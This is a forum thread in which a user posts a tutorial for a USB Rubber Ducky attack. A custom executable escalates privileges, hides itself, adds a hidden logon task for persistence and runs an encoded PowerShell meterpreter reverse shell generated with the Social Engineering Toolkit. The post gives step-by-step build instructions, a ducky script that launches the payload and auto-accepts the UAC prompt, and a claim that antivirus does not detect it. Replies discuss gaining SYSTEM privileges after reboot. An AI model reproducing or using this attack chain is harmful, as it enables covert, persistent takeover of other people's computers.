Jump to content

chaz

Active Members
  • Posts

    10
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by chaz

  1. 4 hours ago, henna3 said:

    Everything works except the persistence. Cant get that to work for some reason.. Do you know how to fix this?

    Nice script though chaz!!

    The reboot persistence?  I don't mean that if a session dies it will come back to life, it will just execute again when rebooted.  If you could check task scheduler to see if a task is created and get back to me that would be awesome!  And thanks btw :)

  2. 1 hour ago, mrdeep said:

    This looks solid. I compiled the program and will try it out on my ducky later! A small pro tip, you need to escape quotation marks if they appear in your script. Like so:

    
    pInstance.AddScript("powershell -w 1 -C \"sv SS...." 

    Or it won't compile correctly.

     

     

    Thanks for this. I will update later.

    Yeah definitely, though all the powershell scripts that I've generated with S.E.T don't have any quotation marks, but for non-programmers, a very good tip!

  3. 3 hours ago, Shonenx333 said:

    The payload works (except i had to change the powershell execution to use  Process not the Powershell - because win7 threw a exception right there). I also modified the PSExec a little bit. payload.txt does contain the part after -EncodedCommand so you can swap the payload easily without needing to recompile the PSExec everytime which may not be possible everytime.

    Thanks nice idea :) It works a exspected you will get Sys Privs easily (except for Win10 which may be a MSF Problem) and the payload stays persistent with SysPrivs after reboot.

    Nice work ;)

     

    Good to hear!  Glad you got it working on Windows 7, and yeah having the script as an external resource to load at runtime is probably a better idea!  Interestingly I had no issues with System Privs and Windows 10, I just executed 'getsystem' in my meterpreter prompt and I got elevated (even after reboot).

     

    Thanks for your kind words :)

  4. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :)  I've created a ducky script and coded an executable which will achieve the title of this topic.  This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar.  Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later).  

     

    What the executable does:

    -  Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user.

    -  Depending on privilege level, either continue execution or attempt to elevate.

    (-  If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y')

    -  Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden.

    -  Creates a hidden Task Scheduler task which runs the executable on each user logon.

    -  Executes encoded Powershell payload.

     

    Why smart privilege checking is important:

    If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear:

    LHDfV.png     

    This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right?  This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell.  Now if a user is part of the admin group then we see a dialog like this:

    0-disable-uac-user-account-control-promp

    This is where we'd like our ducky script to hit 'ALT Y' and bam!  We can then just use meterpreters 'getsystem' command and we're away!

    Tutorial:

    What you'll need:

    -  Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).

    -  Linux based PC/VM for generating our payload/listening for connections.  Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload.

    -  USB Rubber ducky (with Twin Duck or similar firmware installed)

    -  This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html  (On your Windows PC/VM, unzip it before)

     

    Let's start:

    -  On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.

    -  You will be presented with various options, hit '1' and then enter.

    -  Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter.

    -  More options, hit '1' and then enter.

    -  Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding)

    -  Give it a port and then say 'yes' when it asks if you want to start the listener.

    -  Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/'

    -  You have just started a webserver on port 80.  Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt'

    You should be faced with this screen: 

    22653e08a313d5d83e4402239d28b71f.png

    -  Select all the text and copy it.

    -  Open Visual Studio and click 'Open Project'.  Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:

    5af6df8e010eb680cac89f51aa1ef974.png

    -  Go to the line with the pre-inserted Powershell payload (Line 64):

    674cc248205db1fefc0a1ed79ab3cc16.png 

    -  Replace the text within the double quotes with your payload you got from the web server earlier.

    -  Go to the build menu at the top and click 'Build Solution'.  Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. 

    -  Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need.

    -  Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive.

    -  Now we need our ducky payload, here is the code:

    REM Awesome script
    DELAY 500
    GUI R
    DELAY 50
    STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
    DELAY 50
    ENTER
    DELAY 1500
    ALT Y
    DELAY 1000
    STRING exit
    DELAY 50
    ENTER
    DELAY 50
    STRING exit
    DELAY 50
    ENTER

    -  Generate your inject.bin file with an encoder.

    -  Copy the inject.bin to your Ducky's drive and there we have it!

     

    Some caveats:

    -  The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script.

    -  Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works!

     

    So tell me what you think, feedback is greatly appreciated!

    • Upvote 2
×
×
  • Create New...